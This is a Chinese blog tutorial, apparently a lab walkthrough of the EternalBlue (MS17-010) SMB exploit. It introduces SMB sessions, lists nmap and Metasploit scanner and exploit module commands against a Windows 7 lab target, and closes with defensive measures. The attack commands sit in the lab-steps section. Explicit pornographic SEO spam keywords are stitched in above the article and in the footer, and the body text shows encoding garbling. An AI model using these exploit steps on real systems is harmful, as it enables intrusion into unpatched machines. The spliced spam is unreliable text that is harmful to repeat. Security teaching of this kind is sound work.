精品秘无码一区二区三区老师-精品秘一区二三区免费雷安-精品蜜桃秘一区二区三区-精品蜜桃秘一区二区三区粉嫩-精品蜜桃一区二区三区-精品蜜臀国产aⅴ一区二区三区

LOGO OA教程 ERP教程 模切知識交流 PMS教程 CRM教程 開發(fā)文檔 其他文檔  
 
網(wǎng)站管理員

【W(wǎng)eb滲透】永恒之藍(lán),勒索病毒的力量來源

admin
2024年1月9日 10:52 本文熱度 839

一:介紹


1.什么是永恒之藍(lán)。

永恒之藍(lán)(Eternal Blue)爆發(fā)于2017年4月14日晚,是一種利用Windows系統(tǒng)的SMB協(xié)議漏洞來獲取系統(tǒng)的最高權(quán)限,以此來控制被入侵的計(jì)算機(jī)。甚至于2017年5月12日, 不法分子通過改造“永恒之藍(lán)”制作了wannacry勒索病毒,使全世界大范圍
內(nèi)遭受了該勒索病毒,甚至波及到學(xué)校、大型企業(yè)、政府等機(jī)構(gòu),只能通過支付高額的贖金才能恢復(fù)出文件。不過在該病毒出來不久就被微軟通過打補(bǔ)丁修復(fù)。


2.SMB協(xié)議介紹。

SMB(ServerMessage Block)通信協(xié)議是微軟(Microsoft)和英特爾(Intel)在1987年制定的協(xié)議,主要是作為Microsoft網(wǎng)絡(luò)的通訊協(xié)議。SMB 是在會(huì)話層(session layer)和表示層(presentation layer)以及小部分應(yīng)用層(application layer)的協(xié)議。SMB使用了NetBIOS的應(yīng)用程序接口 (Application Program Interface,簡稱API),一般端口使用為139,445。


3.SMB會(huì)話生命階段。

1) SMB協(xié)議協(xié)商(Negotiate)

在一個(gè)SMB還沒有開始的時(shí)候,由客戶端率先發(fā)出一個(gè)協(xié)商請求。在請求中,客戶端會(huì)列出所有它所支持協(xié)議版本以及所支持的一些特性(比如加密Encryption、持久句柄Persistent Handle、客戶端緩存Leasing等等)。而服務(wù)端在回復(fù)中則會(huì)指定一個(gè)SMB版本且列出客戶端與服務(wù)端共同支持的特性。


2)建立SMB會(huì)話(Session Setup)

客戶端選擇一個(gè)服務(wù)端支持的協(xié)議來進(jìn)行用戶認(rèn)證,可以選擇的認(rèn)證協(xié)議一般包括NTLM、Kerberos等。按照選擇的認(rèn)證協(xié)議的不同,這個(gè)階段可能會(huì)進(jìn)行一次或多次SESSION_SETOP請求/回復(fù)的網(wǎng)絡(luò)包交換。


3)連接一個(gè)文件分享(Tree Connect)

在會(huì)話建立之后,客戶端會(huì)發(fā)出連接文件分享的請求。源于文件系統(tǒng)的樹形結(jié)構(gòu),該請求被命名為樹連接(Tree Connect)。以SMB協(xié)議的阿里云NAS為例,一般的SMB掛載命令為:net use z: \\XXX.nas.aliyuncs.com\myshare其中的“ \\XXX.nas.aliyuncs.com\myshare”便是我們將要連接的那個(gè)文件分享,也便是那棵“樹”。如果在“myshare”中創(chuàng)建有子目錄“abc”,那直接連接“abc”這棵子樹也是可以的:net use z: \\XXX.nas.aliyuncs.com\myshare\abc


4) 文件系統(tǒng)操作

在文件分享連接成功之后,用戶通過SMB客戶端進(jìn)行真正的對于目標(biāo)文件分享的業(yè)務(wù)操作。這個(gè)階段可以用到的指令有CREATE、CLOSE、FLUSH、READ、WRITE、SETINFO、GETINFO等等。


5)斷開文件分享連接(Tree Disconnect)

當(dāng)一個(gè)SMB會(huì)話被閑置一定時(shí)間之后,Windows會(huì)自動(dòng)斷開文件分享連接并隨后中止SMB會(huì)話。這個(gè)閑置時(shí)間可以通過Windows注冊表進(jìn)行設(shè)定。當(dāng)然,用戶也可以主動(dòng)發(fā)起斷開連接請求。


6)終止SMB會(huì)話(Logoff)

當(dāng)客戶端發(fā)出會(huì)話中止請求并得到服務(wù)端發(fā)回的中止成功的回復(fù)之后,這個(gè)SMB會(huì)話至此便正式結(jié)束了。


二.實(shí)驗(yàn)環(huán)境。


1.環(huán)境介紹。

攻擊機(jī):kali:ip:192.168.248.128
靶機(jī):windows7專業(yè)版:ip:192.168.248.130


2.工具介紹:

Metasploit:

Metasploit框架(簡稱MSF)是一個(gè)開源工具,旨在方便滲透測試,它是由Ruby程序語言編 寫的模板化框架,具有很好的擴(kuò)展性,便于滲透測試人員開發(fā),使用定制的工具模板。該工具有六個(gè)模塊,分別為輔助模塊(auxiliary)、滲透攻擊模塊(exploits)、后滲透攻擊模塊(post)、攻擊載荷模塊(payloads)、空指令模塊(nops)、編碼器模塊(encoders),其中msf為總模塊,其他均為分支模塊。此工具集成在kali中。其中auxiliary/scanner/smb/smb_ms17_010是永恒之藍(lán)掃描模塊,exploit/windows/smb/ms17_010_eternalblue是永恒之藍(lán)攻擊代碼,一般配合使用,前者先掃描,若顯示有漏洞,再進(jìn)行攻擊。


三.實(shí)驗(yàn)步驟。


1.確定連通

用kali中ping命令測試。


2.查看靶機(jī)開放端口。

nmap -r 192.168.248.130

確定端口開放。


3.進(jìn)入msf。

1)使用auxiliary模塊。

use auxiliary/scanner/smb/smb_ms17_010

2)查看需要配置的信息

show  options

3)設(shè)置攻擊目標(biāo)及端口

set rhosts 192.168.248.130
set rport 445

經(jīng)測試后發(fā)現(xiàn)存在漏洞。

4)使用exploit/windows/smb/ms17_010_eternalblue進(jìn)行攻擊。

use exploit/windows/smb/ms17_010_eternalblue

至此漏洞利用結(jié)束。

三.永恒之藍(lán)防護(hù)

1)禁用SMB協(xié)議

2)打開Windows Update,或手動(dòng)安裝補(bǔ)丁

3)使用防火墻阻止445端口的連接,或者使用進(jìn)/出站規(guī)則阻止445端口的連接

4)不要隨意打開陌生的文件

4)安裝殺毒軟件,及時(shí)更新病毒庫


該文章在 2024/12/16 11:03:56 編輯過
關(guān)鍵字查詢
相關(guān)文章
正在查詢...
點(diǎn)晴ERP是一款針對中小制造業(yè)的專業(yè)生產(chǎn)管理軟件系統(tǒng),系統(tǒng)成熟度和易用性得到了國內(nèi)大量中小企業(yè)的青睞。
點(diǎn)晴PMS碼頭管理系統(tǒng)主要針對港口碼頭集裝箱與散貨日常運(yùn)作、調(diào)度、堆場、車隊(duì)、財(cái)務(wù)費(fèi)用、相關(guān)報(bào)表等業(yè)務(wù)管理,結(jié)合碼頭的業(yè)務(wù)特點(diǎn),圍繞調(diào)度、堆場作業(yè)而開發(fā)的。集技術(shù)的先進(jìn)性、管理的有效性于一體,是物流碼頭及其他港口類企業(yè)的高效ERP管理信息系統(tǒng)。
點(diǎn)晴WMS倉儲(chǔ)管理系統(tǒng)提供了貨物產(chǎn)品管理,銷售管理,采購管理,倉儲(chǔ)管理,倉庫管理,保質(zhì)期管理,貨位管理,庫位管理,生產(chǎn)管理,WMS管理系統(tǒng),標(biāo)簽打印,條形碼,二維碼管理,批號管理軟件。
點(diǎn)晴免費(fèi)OA是一款軟件和通用服務(wù)都免費(fèi),不限功能、不限時(shí)間、不限用戶的免費(fèi)OA協(xié)同辦公管理系統(tǒng)。
Copyright 2010-2025 ClickSun All Rights Reserved

主站蜘蛛池模板: 亚洲欧美一区二区三区色戒 | 国产激情一区二区三区 | 国产熟女露脸大叫高潮综艺在线视频观看 | 无码一区二区波多野结衣播放搜索 | 日韩精品一区二区三区毛片 | 国产精品播放一区二区三区 | 自拍日韩亚洲一区在线 | 国产无人区一卡2卡三卡4卡仙 | 无码中文一区二区三区视频 | 国产男女无遮挡猛进猛出 | 久久棈精品久久久久久噜噜 | 久久精品女人天堂av | 制服丝袜人妻中出第一页 | 一本一道波多野结衣av中文 | 99久久国产露脸精品国产麻豆 | 中文字幕三级无码专区 | 国产成a人亚洲精品无码樱花 | 日本一本二本三区无码 | 日韩精品无码一区二区 | 欧美日韩亚洲综合一区二区三区 | 亚洲欧美韩国日产综合在线 | 免费黄色一区二区 | 伊人久久大香线焦av一区二区 | 国产成人综合亚洲专区 | 亚洲欧美综合乱码精品成人网 | 动漫无码黑人日本边添边摸边做边爱图片 | 精品国产v无码大片在线观看 | 精品国产人妻国语 | 亚洲av无码成h人动漫无广告 | 国产精品人妻出轨AV大片 | 国产三级316在线 | 欧美成年黄网站色视频 | 亚洲色大网站www永久网站 | 97国产无遮挡A片又黄又爽 | 亚洲av一二三四区四色婷婷 | 亚洲成av人片天堂网久久浪潮 | 黄色免费网页日韩 | 巨乳色视频播放 | 国产蜜臂口爆一区二区三区 | 欧美成人r级一级二级三级 欧美成人h在线观看完整版 | 美女制服丝袜一区二区三区 |